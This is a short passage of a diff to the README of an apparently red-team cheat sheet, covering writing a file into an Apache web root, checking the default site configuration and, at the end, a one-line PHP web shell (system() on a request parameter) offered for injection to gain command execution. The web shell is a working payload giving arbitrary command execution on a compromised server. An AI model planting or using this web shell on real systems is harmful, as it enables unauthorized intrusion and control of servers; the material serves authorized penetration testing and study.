rdoix/Red-Team-Cheat-Sheet/README.md

 www/html/test.txt’
 ```
 After that visit http://x.x.x.x/test.txt

-Also check default 000-default.conf which is under /etc/apache2/sites-enabled/000-
+Also check default 000-default.conf which is under /etc/apache2/sites-enabled/000-dafeult-conf
-dafeult-conf

 also one can achieve a web shell by injection a php file:
 ```
 <?php system($_REQUEST["exec"]);?>